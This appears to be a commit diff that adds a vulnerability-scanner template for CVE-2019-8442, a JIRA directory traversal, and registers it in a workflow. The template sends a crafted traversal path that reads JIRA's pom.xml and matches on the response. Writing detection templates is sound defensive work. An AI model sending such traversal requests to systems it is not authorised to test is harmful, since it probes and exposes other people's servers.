commit
b4b712f4e8
|
@ -0,0 +1,19 @@
|
|||
id: cve-2019-8442
|
||||
info:
|
||||
name: JIRA Directory Traversal
|
||||
author: Kishore Krishna (siLLyDaddy)
|
||||
severity: medium
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- >-
|
||||
{{BaseURL}}/s/anything/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- <groupId>com.atlassian.jira</groupId>
|
||||
part: body
|
|
@ -18,6 +18,7 @@ variables:
|
|||
jira_cve_5: cves/CVE-2019-3396.yaml
|
||||
jira_cve_6: cves/CVE-2020-14179.yaml
|
||||
jira_cve_7: cves/CVE-2020-14181.yaml
|
||||
jira_cve_8: cves/CVE-2019-8442.yaml
|
||||
|
||||
logic:
|
||||
|
|
||||
|
@ -34,4 +35,5 @@ logic:
|
|||
jira_cve_5()
|
||||
jira_cve_6()
|
||||
jira_cve_7()
|
||||
jira_cve_8()
|
||||
}
|
||||
|
|
Loading…
Reference in New Issue